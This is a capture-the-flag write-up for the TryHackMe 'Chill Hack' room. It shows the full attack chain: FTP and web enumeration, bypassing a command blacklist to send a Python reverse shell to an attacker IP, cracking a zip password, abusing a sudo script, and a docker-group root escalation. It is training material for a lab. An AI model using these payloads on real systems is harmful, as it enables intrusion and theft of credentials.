TryHackMe-Chill-Hack

From aldeid
Jump to navigation Jump to search

Chill the Hack out of the Machine.

Easy level CTF. Capture the flags and have fun!

User Flag

Initial foothold

An initial scan confirms that 3 services are exposed:

PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.50.72
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)
80/tcp    open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info

FTP

Starting with FTP, we connect as anonymous and discover a note that discloses 2 usernames (anurodh and apaar) and tells us we will have to bypass a protection when entering our command (we’ll see that later).

kali@kali:/data/Chill_Hack$ ftp 10.10.51.62
Connected to 10.10.51.62.
220 (vsFTPd 3.0.3)
Name (10.10.51.62:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Oct 03  2020 .
drwxr-xr-x    2 0        115          4096 Oct 03  2020 ..
-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
226 Directory send OK.
ftp> get note.txt -
remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (90 bytes).
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
226 Transfer complete.
90 bytes received in 0.00 secs (62.4667 kB/s)

Web

The enumeration of the web server with gobuster highlights the presence of a /secret directory.

kali@kali:/data/vpn$ gobuster dir -u http://10.10.51.62 -x txt,php,tar,zip -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.51.62
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,tar,zip
[+] Timeout:        10s
===============================================================
2021/04/26 12:39:53 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.php (Status: 403)
/.hta.tar (Status: 403)
/.hta.zip (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.tar (Status: 403)
/.htaccess.zip (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.tar (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.php (Status: 403)
/contact.php (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/secret (Status: 301) <------------------------ interesting!
/server-status (Status: 403)
===============================================================
2021/04/26 12:41:48 Finished
===============================================================

Browsing this resource shows a form that allows to execute a command (remember the hint from the FTP service).

kali@kali:/data/vpn$ curl -s http://10.10.51.62/secret/
<html>
<body>

<form method="POST">
        <input id="comm" type="text" name="command" placeholder="Command">
        <button>Execute</button>
</form>
</body>
</html>

Some commands work (e.g. id), meaning that they are not filtered:

kali@kali:/data/Chill_Hack$ curl -X POST -d "command=id" http://10.10.51.62/secret/
<html>
<body>

<form method="POST">
        <input id="comm" type="text" name="command" placeholder="Command">
        <button>Execute</button>
</form>
<h2 style="color:blue;">uid=33(www-data) gid=33(www-data) groups=33(www-data)
</h2>
            <style>
                             body
                             {
                                   background-image: url('images/blue_boy_typing_nothought.gif');  
                   background-position: center center;
                   background-repeat: no-repeat;
                   background-attachment: fixed;
                   background-size: cover;
}
                          </style>
    </body>
</html>

Bypass protection

If we were able to execute id, this command won’t really help us to go further, and we will obviously need to set up a reverse shell. As we assumed from the previous hint, it is confirmed that there is a filter that prevents from injecting some strings, like ls, cat, more, less, …

That said, we can find alternatives. For example, xxd is permitted to read files instead of cat:

kali@kali:/data/Chill_Hack$ curl -X POST -d "command=xxd%20index.php" http://10.10.51.62/secret/
<html>
<body>

<form method="POST">
        <input id="comm" type="text" name="command" placeholder="Command">
        <button>Execute</button>
</form>
<h2 style="color:blue;">00000000: 3c68 746d 6c3e 0a3c 626f 6479 3e0a 0a3c  <html>.<body>..<
00000010: 666f 726d 206d 6574 686f 643d 2250 4f53  form method="POS
00000020: 5422 3e0a 2020 2020 2020 2020 3c69 6e70  T">.        <inp
00000030: 7574 2069 643d 2263 6f6d 6d22 2074 7970  ut id="comm" typ
00000040: 653d 2274 6578 7422 206e 616d 653d 2263  e="text" name="c
00000050: 6f6d 6d61 6e64 2220 706c 6163 6568 6f6c  ommand" placehol
00000060: 6465 723d 2243 6f6d 6d61 6e64 223e 0a20  der="Command">. 
00000070: 2020 2020 2020 203c 6275 7474 6f6e 3e45         <button>E
00000080: 7865 6375 7465 3c2f 6275 7474 6f6e 3e0a  xecute</button>.
00000090: 3c2f 666f 726d 3e0a 3c3f 7068 700a 2020  </form>.<?php.  
000000a0: 2020 2020 2020 6966 2869 7373 6574 2824        if(isset($
000000b0: 5f50 4f53 545b 2763 6f6d 6d61 6e64 275d  _POST['command']
000000c0: 2929 0a20 2020 2020 2020 207b 0a20 2020  )).        {.   
000000d0: 2020 2020 2020 2020 2020 2020 2024 636d               $cm
000000e0: 6420 3d20 245f 504f 5354 5b27 636f 6d6d  d = $_POST['comm
000000f0: 616e 6427 5d3b 0a20 2020 2020 2020 2020  and'];.         
00000100: 2020 2020 2020 2024 7374 6f72 6520 3d20         $store = 
00000110: 6578 706c 6f64 6528 2220 222c 2463 6d64  explode(" ",$cmd
00000120: 293b 0a20 2020 2020 2020 2020 2020 2020  );.             
00000130: 2020 2024 626c 6163 6b6c 6973 7420 3d20     $blacklist = 
00000140: 6172 7261 7928 276e 6327 2c20 2770 7974  array('nc', 'pyt
00000150: 686f 6e27 2c20 2762 6173 6827 2c27 7068  hon', 'bash','ph
00000160: 7027 2c27 7065 726c 272c 2772 6d27 2c27  p','perl','rm','
00000170: 6361 7427 2c27 6865 6164 272c 2774 6169  cat','head','tai
00000180: 6c27 2c27 7079 7468 6f6e 3327 2c27 6d6f  l','python3','mo
00000190: 7265 272c 276c 6573 7327 2c27 7368 272c  re','less','sh',
000001a0: 276c 7327 293b 0a20 2020 2020 2020 2020  'ls');.         
000001b0: 2020 2020 2020 2066 6f72 2824 693d 303b         for($i=0;
000001c0: 2024 693c 636f 756e 7428 2473 746f 7265   $i<count($store
000001d0: 293b 2024 692b 2b29 0a20 2020 2020 2020  ); $i++).       
000001e0: 2020 2020 2020 2020 207b 0a20 2020 2020           {.     
000001f0: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000200: 2020 2066 6f72 2824 6a3d 303b 2024 6a3c     for($j=0; $j<
00000210: 636f 756e 7428 2462 6c61 636b 6c69 7374  count($blacklist
00000220: 293b 2024 6a2b 2b29 0a20 2020 2020 2020  ); $j++).       
00000230: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000240: 207b 0a20 2020 2020 2020 2020 2020 2020   {.             
00000250: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000260: 2020 2069 6628 2473 746f 7265 5b24 695d     if($store[$i]
00000270: 203d 3d20 2462 6c61 636b 6c69 7374 5b24   == $blacklist[$
00000280: 6a5d 290a 0909 0909 7b3f 3e0a 0909 0909  j]).....{?>.....
00000290: 093c 6831 2073 7479 6c65 3d22 636f 6c6f  .<h1 style="colo
000002a0: 723a 7265 643b 223e 4172 6520 796f 7520  r:red;">Are you 
000002b0: 6120 6861 636b 6572 3f3c 2f68 313e 0a09  a hacker?</h1>..
000002c0: 0909 0909 3c73 7479 6c65 3e0a 0909 0909  ....<style>.....
000002d0: 0909 626f 6479 0a09 0909 0909 097b 0a09  ..body.......{..
000002e0: 0909 0909 0909 6261 636b 6772 6f75 6e64  ......background
000002f0: 2d69 6d61 6765 3a20 7572 6c28 2769 6d61  -image: url('ima
00000300: 6765 732f 4661 696c 696e 674d 6973 6572  ges/FailingMiser
00000310: 6162 6c65 4577 652d 7369 7a65 5f72 6573  ableEwe-size_res
00000320: 7472 6963 7465 642e 6769 6627 293b 0a09  tricted.gif');..
00000330: 0909 0909 0909 6261 636b 6772 6f75 6e64  ......background
00000340: 2d70 6f73 6974 696f 6e3a 2063 656e 7465  -position: cente
00000350: 7220 6365 6e74 6572 3b0a 2020 0909 0909  r center;.  ....
00000360: 0909 0962 6163 6b67 726f 756e 642d 7265  ...background-re
00000370: 7065 6174 3a20 6e6f 2d72 6570 6561 743b  peat: no-repeat;
00000380: 0a20 2009 0909 0909 0909 6261 636b 6772  .  .......backgr
00000390: 6f75 6e64 2d61 7474 6163 686d 656e 743a  ound-attachment:
000003a0: 2066 6978 6564 3b0a 2020 0909 0909 0909   fixed;.  ......
000003b0: 0962 6163 6b67 726f 756e 642d 7369 7a65  .background-size
000003c0: 3a20 636f 7665 723b 0909 0909 090a 097d  : cover;.......}
000003d0: 090a 0909 0909 093c 2f73 7479 6c65 3e0a  .......</style>.
000003e0: 3c3f 7068 7009 0909 0909 2072 6574 7572  <?php..... retur
000003f0: 6e3b 0a09 0909 097d 0a20 2020 2020 2020  n;.....}.       
00000400: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000410: 207d 0a20 2020 2020 2020 2020 2020 2020   }.             
00000420: 2020 207d 0a09 093f 3e3c 6832 2073 7479     }...?><h2 sty
00000430: 6c65 3d22 636f 6c6f 723a 626c 7565 3b22  le="color:blue;"
00000440: 3e3c 3f70 6870 2065 6368 6f20 7368 656c  ><?php echo shel
00000450: 6c5f 6578 6563 2824 636d 6429 3b3f 3e3c  l_exec($cmd);?><
00000460: 2f68 323e 0a09 0909 3c73 7479 6c65 3e0a  /h2>....<style>.
00000470: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000480: 2020 2020 2020 2020 2020 2020 2062 6f64               bod
00000490: 790a 2020 2020 2020 2020 2020 2020 2020  y.              
000004a0: 2020 2020 2020 2020 2020 2020 2020 207b                 {
000004b0: 0a20 2020 2020 2020 2020 2020 2020 2020  .               
000004c0: 2020 2020 2020 2020 2020 2020 2020 2020                  
000004d0: 2020 2020 6261 636b 6772 6f75 6e64 2d69      background-i
000004e0: 6d61 6765 3a20 7572 6c28 2769 6d61 6765  mage: url('image
000004f0: 732f 626c 7565 5f62 6f79 5f74 7970 696e  s/blue_boy_typin
00000500: 675f 6e6f 7468 6f75 6768 742e 6769 6627  g_nothought.gif'
00000510: 293b 2020 0a09 0909 0920 2020 6261 636b  );  .....   back
00000520: 6772 6f75 6e64 2d70 6f73 6974 696f 6e3a  ground-position:
00000530: 2063 656e 7465 7220 6365 6e74 6572 3b0a   center center;.
00000540: 2020 0909 0909 2020 2062 6163 6b67 726f    ....   backgro
00000550: 756e 642d 7265 7065 6174 3a20 6e6f 2d72  und-repeat: no-r
00000560: 6570 6561 743b 0a20 2009 0909 0920 2020  epeat;.  ....   
00000570: 6261 636b 6772 6f75 6e64 2d61 7474 6163  background-attac
00000580: 686d 656e 743a 2066 6978 6564 3b0a 2020  hment: fixed;.  
00000590: 0909 0909 2020 2062 6163 6b67 726f 756e  ....   backgroun
000005a0: 642d 7369 7a65 3a20 636f 7665 723b 0a7d  d-size: cover;.}
000005b0: 0a20 2020 2020 2020 2020 2020 2020 2020  .               
000005c0: 2020 2020 2020 2020 2020 203c 2f73 7479             </sty
000005d0: 6c65 3e0a 093c 3f70 6870 207d 0a3f 3e0a  le>..<?php }.?>.
000005e0: 3c2f 626f 6479 3e0a 3c2f 6874 6d6c 3e0a  </body>.</html>.
</h2>
            <style>
                             body
                             {
                                   background-image: url('images/blue_boy_typing_nothought.gif');  
                   background-position: center center;
                   background-repeat: no-repeat;
                   background-attachment: fixed;
                   background-size: cover;
}
                          </style>
    </body>
</html>

Instead of ls, we can use echo *:

kali@kali:/data/Chill_Hack$ curl -X POST -d "command=echo%20*" http://10.10.51.62/secret/
<html>
<body>

<form method="POST">
        <input id="comm" type="text" name="command" placeholder="Command">
        <button>Execute</button>
</form>
<h2 style="color:blue;">images index.php
</h2>
            <style>
                             body
                             {
                                   background-image: url('images/blue_boy_typing_nothought.gif');  
                   background-position: center center;
                   background-repeat: no-repeat;
                   background-attachment: fixed;
                   background-size: cover;
}
                          </style>
    </body>
</html>

Download reverse shell

After many failed attempts to download a reverse shell (because we don’t have write permissions on the web directories), I eventually found that I could execute a python reverse shell by escaping a character of the python string, as follows:

POST /secret/ HTTP/1.1
Host: mafialive.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mafialive.thm/secret/
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Connection: close
Upgrade-Insecure-Requests: 1

command=p\ython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Here is the reverse shell window:

kali@kali:/data/Chill_Hack/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.9.76] 53142
www-data@ubuntu:/var/www/html/secret$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The files web directory

After failing at searching for the user flag in the /home directory, I eventually found an interesting directory in /var/www/files/

www-data@ubuntu:/var/www/files$ ll
ll
total 28
drwxr-xr-x 3 root root 4096 Oct  3  2020 .
drwxr-xr-x 4 root root 4096 Oct  3  2020 ..
-rw-r--r-- 1 root root  391 Oct  3  2020 account.php
-rw-r--r-- 1 root root  453 Oct  3  2020 hacker.php
drwxr-xr-x 2 root root 4096 Oct  3  2020 images
-rw-r--r-- 1 root root 1153 Oct  3  2020 index.php
-rw-r--r-- 1 root root  545 Oct  3  2020 style.css
www-data@ubuntu:/var/www/files$ cat hacker.php
cat hacker.php
<html>
<head>
<body>
<style>
body {
  background-image: url('images/002d7e638fb463fb7a266f5ffc7ac47d.gif');
}
h2
{
  color:red;
  font-weight: bold;
}
h1
{
  color: yellow;
  font-weight: bold;
}
</style>
<center>
  <img src = "images/hacker-with-laptop_23-2147985341.jpg"><br>
  <h1 style="background-color:red;">You have reached this far. </h2>
  <h1 style="background-color:black;">Look in the dark! You will find your answer</h1>
</center>
</head>
</html>

Download the image (images/hacker-with-laptop_23-2147985341.jpg). There is a secret in it.

kali@kali:/data/Chill_Hack/files$ file hacker-with-laptop_23-2147985341.jpg 
hacker-with-laptop_23-2147985341.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 626x417, components 3
kali@kali:/data/Chill_Hack/files$ steghide extract -sf hacker-with-laptop_23-2147985341.jpg 
Enter passphrase: 
wrote extracted data to "backup.zip".

The resulting backup.zip file is a password compressed archive. Let’s crack the password.

kali@kali:/data/Chill_Hack/files$ /data/src/john/run/zip2john backup.zip > backup.hash
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: 2b chk, TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 type=8
kali@kali:/data/Chill_Hack/files$ /data/src/john/run/john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word        (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2021-04-26 20:43) 9.090g/s 111709p/s 111709c/s 111709C/s total90..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Lateral move (www-data -> anurodh)

The backup contains a PHP file (source_code.php):

<html>
<head>
  Admin Portal
</head>
        <title> Site Under Development ... </title>
        <body>
                <form method="POST">
                        Username: <input type="text" name="name" placeholder="username"><br><br>
      Email: <input type="email" name="email" placeholder="email"><br><br>
      Password: <input type="password" name="password" placeholder="password">
                        <input type="submit" name="submit" value="Submit"> 
    </form>
<?php
        if(isset($_POST['submit']))
  {
    $email = $_POST["email"];
    $password = $_POST["password"];
    if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
    { 
      $random = rand(1000,9999);?><br><br><br>
      <form method="POST">
        Enter the OTP: <input type="number" name="otp">
        <input type="submit" name="submitOtp" value="Submit">
      </form>
    <?php mail($email,"OTP for authentication",$random);
      if(isset($_POST["submitOtp"]))
        {
          $otp = $_POST["otp"];
          if($otp == $random)
          {
            echo "Welcome Anurodh!";
            header("Location: authenticated.php");
          }
          else
          {
            echo "Invalid OTP";
          }
        }
    }
    else
    {
      echo "Invalid Username or Password";
    }
        }
?>
</html>

This source code reveals a username and a base64 encoded password:

  • Username: Anurodh
  • Password: !d0ntKn0wmYp@ssw0rd

These credentials allow a SSH login as anurodh.

Lateral move (anurodh -> apaar)

We can execute /home/apaar/.helpline.sh as apaar without password:

anurodh@ubuntu:~$ sudo -l
Matching Defaults entries for anurodh on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User anurodh may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh

Below is the content of the script:

anurodh@ubuntu:~$ cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
anurodh@ubuntu:~$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: oops
Hello user! I am oops,  Please enter your message: /bin/bash
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
python3 -c "import pty;pty.spawn('/bin/bash')"
bash: /home/anurodh/.bashrc: Permission denied
apaar@ubuntu:~$ cd /home/apaar
apaar@ubuntu:/home/apaar$ ls -la
total 44
drwxr-xr-x 5 apaar apaar 4096 Oct  4  2020 .
drwxr-xr-x 5 root  root  4096 Oct  3  2020 ..
-rw------- 1 apaar apaar    0 Oct  4  2020 .bash_history
-rw-r--r-- 1 apaar apaar  220 Oct  3  2020 .bash_logout
-rw-r--r-- 1 apaar apaar 3771 Oct  3  2020 .bashrc
drwx------ 2 apaar apaar 4096 Oct  3  2020 .cache
drwx------ 3 apaar apaar 4096 Oct  3  2020 .gnupg
-rwxrwxr-x 1 apaar apaar  286 Oct  4  2020 .helpline.sh
-rw-rw---- 1 apaar apaar   46 Oct  4  2020 local.txt
-rw-r--r-- 1 apaar apaar  807 Oct  3  2020 .profile
drwxr-xr-x 2 apaar apaar 4096 Oct  3  2020 .ssh
-rw------- 1 apaar apaar  817 Oct  3  2020 .viminfo
apaar@ubuntu:/home/apaar$ cat local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}

At this stage, it may be a good idea to add your SSH public key (~/.ssh/id_rsa.pub) to /home/apaar/.ssh/authorized_keys to connect directly using SSH and benefit from a more stable shell.

User flag: {USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}

Root Flag

Logging back to anurodh, we can see that the user is member of the docker group:

anurodh@ubuntu:/home/apaar$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)

let’s confirm:

anurodh@ubuntu:/home/apaar$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
alpine              latest              a24bb4013296        11 months ago       5.57MB
hello-world         latest              bf756fb1ae65        16 months ago       13.3kB

Checking on GTFOBins, we confirm there is a possible privilege escalation; let’s test:

anurodh@ubuntu:/home/apaar$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd /root
# ls -la
total 68
drwx------  6 root root  4096 Oct  4  2020 .
drwxr-xr-x 24 root root  4096 Oct  3  2020 ..
-rw-------  1 root root     0 Oct  4  2020 .bash_history
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  2 root root  4096 Oct  3  2020 .cache
drwx------  3 root root  4096 Oct  3  2020 .gnupg
-rw-------  1 root root   370 Oct  4  2020 .mysql_history
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rw-r--r--  1 root root 12288 Oct  4  2020 .proof.txt.swp
drwx------  2 root root  4096 Oct  3  2020 .ssh
drwxr-xr-x  2 root root  4096 Oct  3  2020 .vim
-rw-------  1 root root 11683 Oct  4  2020 .viminfo
-rw-r--r--  1 root root   166 Oct  3  2020 .wget-hsts
-rw-r--r--  1 root root  1385 Oct  4  2020 proof.txt
# cat proof.txt 


          {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}


Congratulations! You have successfully completed the challenge.


         ,-.-.     ,----.                                             _,.---._    .-._           ,----.  
,-..-.-./  \==\ ,-.--` , \   _.-.      _.-.             _,..---._   ,-.' , -  `. /==/ \  .-._ ,-.--` , \ 
|, \=/\=|- |==||==|-  _.-` .-,.'|    .-,.'|           /==/,   -  \ /==/_,  ,  - \|==|, \/ /, /==|-  _.-` 
|- |/ |/ , /==/|==|   `.-.|==|, |   |==|, |           |==|   _   _\==|   .=.     |==|-  \|  ||==|   `.-. 
 \, ,     _|==/==/_ ,    /|==|- |   |==|- |           |==|  .=.   |==|_ : ;=:  - |==| ,  | -/==/_ ,    / 
 | -  -  , |==|==|    .-' |==|, |   |==|, |           |==|,|   | -|==| , '='     |==| -   _ |==|    .-'  
  \  ,  - /==/|==|_  ,`-._|==|- `-._|==|- `-._        |==|  '='   /\==\ -    ,_ /|==|  /\ , |==|_  ,`-._ 
  |-  /\ /==/ /==/ ,     //==/ - , ,/==/ - , ,/       |==|-,   _`/  '.='. -   .' /==/, | |- /==/ ,     / 
  `--`  `--`  `--`-----`` `--`-----'`--`-----'        `-.`.____.'     `--`--''   `--`./  `--`--`-----``  


--------------------------------------------Designed By -------------------------------------------------------
          |  Anurodh Acharya |
          ---------------------

                         Let me know if you liked it.

Twitter
  - @acharya_anurodh
Linkedin
  - www.linkedin.com/in/anurodh-acharya-b1937116a



# 

Root flag: {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}